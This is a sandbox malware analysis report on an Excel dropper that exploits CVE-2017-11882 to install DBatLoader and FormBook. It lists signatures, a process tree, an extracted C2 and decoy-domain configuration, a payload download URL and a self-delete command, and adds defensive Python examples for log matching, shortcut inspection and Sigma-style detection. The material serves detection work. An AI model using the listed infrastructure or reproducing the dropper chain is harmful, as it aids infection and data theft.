
Windows Analysis Report 7009.xlsx

Overview

General Information

Sample Name: 7009.xlsx
Analysis ID: 532894
MD5: 8305dc6702f80d7ebe34cd8c63297561
SHA1: db055cce075213d510de5ca9044ea76036dbcd07
SHA256: 9eae576f7ecc05f106a7cfa605b1ca5bcd02c8d1c2c926920c0d7f0cb605b345
Tags: Formbook, VelvetSweatshop, xlsx

Detection

DBatLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected DBatLoader
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
May check if the current machine is a sandbox (GetTickCount - Sleep)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Yara signature match
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Office Equation Editor has been started
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to detect sandboxes (mouse cursor move detection)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1124 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2676 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 488 cmdline: "C:\Users\Public\vbc.exe" MD5: 3A9AE96D1F6404FCCF5BD99B7C5C0383)
      • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • Odhbljup.exe (PID: 1320 cmdline: "C:\Users\user\Odhbljup.exe" MD5: 3A9AE96D1F6404FCCF5BD99B7C5C0383)
        • Odhbljup.exe (PID: 2192 cmdline: "C:\Users\user\Odhbljup.exe" MD5: 3A9AE96D1F6404FCCF5BD99B7C5C0383)
        • NAPSTAT.EXE (PID: 1708 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)
          • cmd.exe (PID: 2172 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.heidecide.xyz/hno0/"], "decoy": ["526854.rest", "loosesalatoyof2.xyz", "drillshear.com", "kdsh-uae.com", "firstnetinsurance.net", "28684dw.com", "hikinglifekr.com", "astramed-clinic.store", "24hxinh.com", "livebongdatv.net", "henrymaskph.com", "newlanlan.com", "txboilerparts.com", "thepurldistrict.com", "changemylifefast.info", "sapphirecloset.com", "ascensionmemberszoom.com", "huffmanworks.com", "techarcstudio.com", "terbulen.store", "naamgem.com", "pwrsearch.com", "al-solaiman.com", "eastrwanda.com", "ruihongco.com", "grandrecordto-gathertoday.info", "bleuexpress.com", "estate.xyz", "intlglobaldelivery.com", "zeneplaza.com", "citiesmalawi.properties", "pumpkincheshire.com", "sunflowerhub.com", "zhongzhenghuagong.com", "aquaticatt.com", "kspqs.com", "cpshapes.com", "fgiheating.com", "primasariutama.com", "hotel-arcosdelparque.com", "benjaminagencymarketing.com", "whiteleyop.xyz", "ahmty.net", "transaction-immo.com", "bungaauraprediction.com", "profumeriamedici.com", "olymporian.com", "uprgoad.com", "negotat.com", "xn--z4qv1cr56dk0k.group", "bestwlz.com", "strongu-miner.com", "presticgroup.com", "cutos2.com", "mintstationery.com", "annengfanglei.com", "carijualpt.com", "chinagxsy.com", "urzeczenie.com", "dianyingyouquanquan.xyz", "voucheraja.com", "sdtcbh.com", "hyslier.com", "siebenmorgenband.com"]}
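
How a responder would turn this configuration into detection content, as an added example that is not part of the report: only the "C2 list" entry is the live server, while the decoy list is the set of domains FormBook beacons to alongside it, using the same URI path, to bury the real C2 in noise (the report's own URL detection, www.urzeczenie.com/hno0/, is a decoy domain carrying that path). The code copies the configuration from the report with the decoy list cut to four entries; the proxy log lines are constructed.

```python
"""Turn the extracted FormBook configuration into detection content and run it
over proxy logs.

Added example, not part of the Joe Sandbox report. FORMBOOK_CONFIG is copied
from the report with the decoy list cut down to four entries; the proxy log
lines are constructed.
"""
from urllib.parse import urlsplit

FORMBOOK_CONFIG = {
    "C2 list": ["www.heidecide.xyz/hno0/"],
    "decoy": ["526854.rest", "drillshear.com", "urzeczenie.com", "siebenmorgenband.com"],
}

# Constructed proxy log, one request per line: "<timestamp> <client> <method> <url>".
SAMPLE_PROXY_LOG = """\
2021-11-20T10:01:02Z 192.168.2.22 GET http://www.heidecide.xyz/hno0/?mhcd=MR-LdRqXxT7p86
2021-11-20T10:01:05Z 192.168.2.22 GET http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86
2021-11-20T10:01:09Z 192.168.2.22 POST http://www.drillshear.com/hno0/
2021-11-20T10:02:00Z 192.168.2.22 GET http://www.drillshear.com/
2021-11-20T10:02:30Z 192.168.2.22 GET http://cdn.example.org/hno0/?abcd=MR-LdRqXxT7p86
"""


def bare_host(host):
    """Lower-case a hostname and strip a trailing dot and a leading 'www.';
    FormBook prefixes every configured domain with 'www.' on the wire."""
    host = (host or "").lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def norm_path(path):
    """FormBook paths are directory-style; compare them with a trailing slash."""
    return path if path.endswith("/") else path + "/"


def build_iocs(cfg):
    """Split the scheme-less C2 entries into hosts and URI paths.
    Returns (c2_hosts, decoy_hosts, c2_paths), all normalized."""
    c2_hosts, paths = set(), set()
    for entry in cfg["C2 list"]:
        parts = urlsplit("http://" + entry)
        c2_hosts.add(bare_host(parts.hostname))
        paths.add(norm_path(parts.path))
    decoys = {bare_host(d) for d in cfg["decoy"]}
    return c2_hosts, decoys, paths


def classify_request(url, iocs):
    """Return 'c2', 'c2-host', 'decoy-beacon', 'path-only' or None for one URL."""
    c2_hosts, decoys, paths = iocs
    parts = urlsplit(url)
    host = bare_host(parts.hostname)
    path = norm_path(parts.path)
    if host in c2_hosts:
        return "c2" if path in paths else "c2-host"
    if path not in paths:
        # A decoy domain on its own is not an indicator: most of them are
        # unrelated sites the bot visits only to bury the real C2 in noise.
        return None
    if host in decoys:
        return "decoy-beacon"
    return "path-only"   # campaign path on a host the config does not list


def scan_log(text, cfg):
    """Return [(timestamp, url, verdict)] for every log line that matches."""
    iocs = build_iocs(cfg)
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        timestamp, _client, _method, url = line.split(maxsplit=3)
        verdict = classify_request(url, iocs)
        if verdict:
            hits.append((timestamp, url, verdict))
    return hits


if __name__ == "__main__":
    for timestamp, url, verdict in scan_log(SAMPLE_PROXY_LOG, FORMBOOK_CONFIG):
        print(f"{timestamp} {verdict:13} {url}")
```

Matching on the campaign path rather than the host catches beacons to every listed domain and survives the operator rotating the live C2, whereas blocking the decoy domains outright would cut off mostly unrelated sites. A short path such as /hno0/ is not unique on its own, so the "path-only" verdict is a lead to correlate with the host's process telemetry, not a block decision.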

Yara Overview

Dropped Files

Source: C:\Users\user\pujlbhdO.url, Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Author: @itsreallynick (Nick Carr), Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
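
The rule above keys on two strings; the natural next step for a responder is to read where URL= points. The following added example (not part of the report or of Nick Carr's rule) reproduces the string matches and then parses the shortcut as the INI file it is, flagging targets that resolve to a local executable or a Startup-folder placement. The report shows only that pujlbhdO.url contains both strings, not what it points to, so both sample files are constructed and the suspicious one uses a placeholder target, C:\Users\user\payload.exe.

```python
"""Inspect a dropped .url (InternetShortcut) file the way the Yara rule does,
then parse where URL= points.

Added example, not part of the report or of the Yara rule. Both sample files
are constructed; the report does not show the target of pujlbhdO.url, so the
suspicious sample points at a placeholder path (C:\\Users\\user\\payload.exe).
"""
import configparser
import re
from urllib.parse import unquote, urlsplit

# The rule's two strings, named as the report lists them.
YARA_STRINGS = {"$url_explicit": b"[InternetShortcut]", "$file": b"URL="}

EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta")

# Constructed samples.
BENIGN_URL = b"[InternetShortcut]\r\nURL=https://example.com/\r\nIconIndex=0\r\n"
SUSPECT_URL = b"[InternetShortcut]\r\nURL=file:///C:/Users/user/payload.exe\r\nIconIndex=0\r\n"


def yara_like_match(data):
    """Mimic the rule: {string_name: first offset} for each string present."""
    return {name: data.find(s) for name, s in YARA_STRINGS.items() if s in data}


def parse_internet_shortcut(data):
    """.url files are INI text; return the [InternetShortcut] section as a dict."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                       # keep key case (URL, IconFile, ...)
    cp.read_string(data.decode("utf-8", "replace"))
    if not cp.has_section("InternetShortcut"):
        return None
    return dict(cp["InternetShortcut"])


def local_target(target):
    """Return the local or UNC path a target resolves to, or None for web URLs."""
    parts = urlsplit(target)
    if parts.scheme.lower() == "file":
        return unquote(parts.path)
    if re.match(r"^[A-Za-z]:[\\/]", target) or target.startswith("\\\\"):
        return target
    return None


def assess(path, data):
    """Classify a .url file found at `path` with contents `data`.
    Returns (verdict, reasons)."""
    reasons = []
    if len(yara_like_match(data)) < 2:
        return "not-a-url-shortcut", reasons
    fields = parse_internet_shortcut(data) or {}
    target = fields.get("URL", "")
    local = local_target(target)
    in_startup = "\\startup\\" in path.lower()
    if in_startup:
        reasons.append("shortcut lives in a Startup folder")
    if local is None:
        return ("review" if in_startup else "benign"), reasons
    reasons.append(f"target is a local or UNC path: {local}")
    if local.lower().endswith(EXECUTABLE_EXT):
        reasons.append("target is an executable type")
        return "persistence", reasons
    return ("persistence" if in_startup else "suspicious"), reasons


if __name__ == "__main__":
    for name, data in (("benign.url", BENIGN_URL), (r"C:\Users\user\pujlbhdO.url", SUSPECT_URL)):
        print(name, yara_like_match(data), assess(name, data))
```

On the constructed samples the string offsets come out as 0x0 and 0x14, the same offsets the report lists for pujlbhdO.url, which is what a section header followed by CRLF and URL= yields. A .url file is not suspicious on its own; the verdict keys on a file:// or drive-letter target that names an executable, or on a local target placed in a Startup folder.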

Memory Dumps

Source: 00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmp, Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Author: @itsreallynick (Nick Carr), Strings:
  • 0x1cf4:$file: URL=
  • 0x1cd8:$url_explicit: [InternetShortcut]
Source: 0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmp, Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Author: @itsreallynick (Nick Carr), Strings:
  • 0x19a8:$file: URL=
  • 0x198c:$url_explicit: [InternetShortcut]
Source: 00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmp, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
Source: 00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmp, Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Author: @itsreallynick (Nick Carr), Strings:
  • 0x1cf4:$file: URL=
  • 0x1cd8:$url_explicit: [InternetShortcut]
Source: 0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmp, Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Author: @itsreallynick (Nick Carr), Strings:
  • 0x1cf4:$file: URL=
  • 0x1cd8:$url_explicit: [InternetShortcut]
(141 entries in total; only the first five are listed here.)

Unpacked PEs

Source: 10.3.Odhbljup.exe.1d02094.286.raw.unpack, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
Source: 7.3.Odhbljup.exe.1d6d598.277.raw.unpack, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
Source: 7.3.Odhbljup.exe.1d82094.284.raw.unpack, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
Source: 4.3.vbc.exe.31d598.276.raw.unpack, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
Source: 4.3.vbc.exe.332094.286.raw.unpack, Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Author: Joe Security
(19 entries in total; only the first five are listed here.)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 13.250.31.113, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2676, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe", CommandLine: "C:\Users\Public\vbc.exe", CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: "C:\Users\Public\vbc.exe", ProcessId: 488
Sigma detected: Execution from Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe", CommandLine: "C:\Users\Public\vbc.exe", CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: "C:\Users\Public\vbc.exe", ProcessId: 488
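
The two Sigma hits above and the process tree earlier on the page are the same chain seen through three event types: a process created by the equation editor, a network connection from it, and a file it wrote. As an added example that is neither the report's own tooling nor the original Sigma rules, the code below runs equivalent conditions over Sysmon-style events reconstructed from the report (field names as Joe Sandbox prints them; the notepad.exe control event and the image path of cmd.exe are assumed, and a few of the suspicious-folder prefixes are taken from memory of the rule rather than from the page) and then walks ParentProcessId back up the tree.

```python
"""Run Sigma-style conditions over Sysmon-style events and walk the process tree.

Added example, not part of the report and not the Sigma rules themselves. The
events are reconstructed from the report's process tree and Sigma hits
(EventID 1 process create, 3 network connect, 11 file create). The notepad.exe
control event and the image path of cmd.exe are assumed.
"""
import re

EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

EVENTS = [
    {"EventID": 3, "ProcessId": 2676, "Image": EQN, "DestinationIp": "13.250.31.113",
     "DestinationPort": 80, "Initiated": True},
    {"EventID": 11, "ProcessId": 2676, "Image": EQN,
     "TargetFilename": r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe"},
    {"EventID": 1, "ProcessId": 488, "Image": r"C:\Users\Public\vbc.exe",
     "CommandLine": r'"C:\Users\Public\vbc.exe"', "ParentProcessId": 2676, "ParentImage": EQN},
    {"EventID": 1, "ProcessId": 1320, "Image": r"C:\Users\user\Odhbljup.exe",
     "CommandLine": r'"C:\Users\user\Odhbljup.exe"', "ParentProcessId": 1764,
     "ParentImage": r"C:\Windows\Explorer.EXE"},
    {"EventID": 1, "ProcessId": 1708, "Image": r"C:\Windows\SysWOW64\NAPSTAT.EXE",
     "CommandLine": r"C:\Windows\SysWOW64\NAPSTAT.EXE", "ParentProcessId": 1764,
     "ParentImage": r"C:\Windows\Explorer.EXE"},
    # The report gives only cmd.exe's command line; the image path is assumed.
    {"EventID": 1, "ProcessId": 2172, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'/c del "C:\Users\Public\vbc.exe"', "ParentProcessId": 1708,
     "ParentImage": r"C:\Windows\SysWOW64\NAPSTAT.EXE"},
    # Constructed control event that should match nothing.
    {"EventID": 1, "ProcessId": 3001, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentProcessId": 1764, "ParentImage": r"C:\Windows\Explorer.EXE"},
]

# Subset of the folder list used by "Execution from Suspicious Folder" (assumed).
SUSPICIOUS_DIRS = ("\\users\\public\\", "\\$recycle.bin\\", "\\users\\default\\", "\\perflogs\\")


def ends_with(value, suffix):
    return bool(value) and value.lower().endswith(suffix.lower())


RULES = {
    # "Droppers Exploiting CVE-2017-11882": anything spawned by the equation editor
    "eqnedt32_spawns_process": lambda e: (
        e["EventID"] == 1 and ends_with(e.get("ParentImage"), "\\EQNEDT32.EXE")),
    # "EQNEDT32.EXE connecting to internet"
    "eqnedt32_network_connection": lambda e: (
        e["EventID"] == 3 and ends_with(e.get("Image"), "\\EQNEDT32.EXE") and bool(e.get("Initiated"))),
    # "File Dropped By EQNEDT32EXE", narrowed to PE-looking names
    "eqnedt32_drops_pe": lambda e: (
        e["EventID"] == 11 and ends_with(e.get("Image"), "\\EQNEDT32.EXE")
        and ends_with(e.get("TargetFilename"), ".exe")),
    # "Execution from Suspicious Folder"
    "execution_from_suspicious_folder": lambda e: (
        e["EventID"] == 1 and any(d in e["Image"].lower() for d in SUSPICIOUS_DIRS)),
    # The cleanup step at the bottom of the tree: cmd.exe deleting the first stage.
    "self_delete_via_cmd": lambda e: (
        e["EventID"] == 1 and ends_with(e.get("Image"), "\\cmd.exe")
        and re.search(r"/c\s+del\s", e.get("CommandLine", ""), re.I) is not None),
}


def run_rules(events, rules=RULES):
    """Return [(rule_name, ProcessId)] in event order."""
    return [(name, e["ProcessId"]) for e in events for name, cond in rules.items() if cond(e)]


def basename(path):
    return path.rsplit("\\", 1)[-1]


def ancestry(pid, events):
    """Follow ParentProcessId through EventID 1 records, child first. The chain
    ends where process-creation telemetry runs out; the last parent is then
    known only from its child's ParentImage field."""
    by_pid = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    chain = []
    while pid in by_pid:
        e = by_pid[pid]
        chain.append(basename(e["Image"]))
        parent = e.get("ParentProcessId")
        if parent not in by_pid and e.get("ParentImage"):
            chain.append(basename(e["ParentImage"]))
        pid = parent
    return chain


if __name__ == "__main__":
    for name, pid in run_rules(EVENTS):
        print(f"{name:34} pid={pid} chain={' <- '.join(ancestry(pid, EVENTS))}")
```

The ancestry of the cmd.exe that deletes vbc.exe stops at explorer.exe. The report's tree shows explorer.exe under vbc.exe only because of injection (the signatures for APC queueing and thread-context modification), and process-creation records cannot express that link; joining the chain back to the Excel document needs injection telemetry such as Sysmon EventID 8 or 10, which is why the EQNEDT32.EXE rules fire on the earliest and cleanest hop.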

Jbx Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig==, Avira URL Cloud: Label: malware
Source: http://13.250.31.113/7009/binso.exe, Avira URL Cloud: Label: malware
Source: www.heidecide.xyz/hno0/, Avira URL Cloud: Label: phishing
Found malware configuration
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.heidecide.xyz/hno0/"], "decoy": ["526854.rest", "loosesalatoyof2.xyz", "drillshear.com", "kdsh-uae.com", "firstnetinsurance.net", "28684dw.com", "hikinglifekr.com", "astramed-clinic.store", "24hxinh.com", "livebongdatv.net", "henrymaskph.com", "newlanlan.com", "txboilerparts.com", "thepurldistrict.com", "changemylifefast.info", "sapphirecloset.com", "ascensionmemberszoom.com", "huffmanworks.com", "techarcstudio.com", "terbulen.store", "naamgem.com", "pwrsearch.com", "al-solaiman.com", "eastrwanda.com", "ruihongco.com", "grandrecordto-gathertoday.info", "bleuexpress.com", "estate.xyz", "intlglobaldelivery.com", "zeneplaza.com", "citiesmalawi.properties", "pumpkincheshire.com", "sunflowerhub.com", "zhongzhenghuagong.com", "aquaticatt.com", "kspqs.com", "cpshapes.com", "fgiheating.com", "primasariutama.com", "hotel-arcosdelparque.com", "benjaminagencymarketing.com", "whiteleyop.xyz", "ahmty.net", "transaction-immo.com", "bungaauraprediction.com", "profumeriamedici.com", "olymporian.com", "uprgoad.com", "negotat.com", "xn--z4qv1cr56dk0k.group", "bestwlz.com", "strongu-miner.com", "presticgroup.com", "cutos2.com", "mintstationery.com", "annengfanglei.com", "carijualpt.com", "chinagxsy.com", "urzeczenie.com", "dianyingyouquanquan.xyz", "voucheraja.com", "sdtcbh.com", "hyslier.com", "siebenmorgenband.com"]}
Multi AV Scanner detection for submitted file
Source: 7009.xlsx, Virustotal: Detection: 35%
Source: 7009.xlsx, ReversingLabs: Detection: 40%
Yara detected FormBook
Source: Yara match, File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe, ReversingLabs: Detection: 35%
Source: C:\Users\user\Odhbljup.exe, ReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 35%
Machine Learning detection for dropped file
Source: C:\Users\user\Odhbljup.exe, Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe, Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.3.vbc.exe.315eec.144.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e610.131.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfdb70.107.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7909c.165.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50f4.106.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33154c.246.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310e80.52.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3152c8.112.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d710a4.42.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cebffc.148.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d1ac.249.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79768.59.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310c38.39.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.162.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3014.139.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331ca4.264.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d598.276.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f0.273.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70008.71.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf058c.74.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6459c.33.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cdcd68.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced598.275.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64370.24.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cefb84.27.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71894.9.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dfc.272.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64d5c.90.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31914c.181.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe2fc.126.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81b18.61.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31cf84.239.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3292e0.46.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81f44.282.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e4.217.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e368.15.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe610.133.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0b08.34.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.30cd68.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e610.133.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331c54.260.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec008.207.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d792e0.43.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f4.268.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331ef4.277.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.319308.5.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318b08.37.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318d98.156.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d010fc.238.unpack, Avira: Label: TR/Patched.Ren.Gen
